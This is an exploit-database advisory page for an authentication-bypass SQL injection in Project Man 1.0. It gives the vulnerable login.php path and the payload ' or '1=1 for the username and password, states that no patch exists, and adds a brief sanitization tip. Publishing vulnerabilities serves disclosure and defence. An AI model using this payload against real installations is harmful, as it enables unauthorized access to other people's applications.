header-logo
Suggest Exploit
vendor:
Project Man
by:
cr4wl3r
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Project Man
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:project_man:project_man:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability

Project Man version 1.0 and below is vulnerable to an authentication bypass vulnerability due to a SQL injection. An attacker can exploit this vulnerability by entering a malicious username and password into the login form. The malicious username and password can be ' or '1=1, which will bypass the authentication process and allow the attacker to gain access to the application.

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

##############################################################
##Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability
##############################################################
Author: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
Download: http://sourceforge.net/projects/projectman1/files/
##############################################################
PoC:
 [Project Man_path]/login.php

Username: ' or '1=1 
password: ' or '1=1 
##############################################################

Navigation

Suggest Exploit

Services By CQR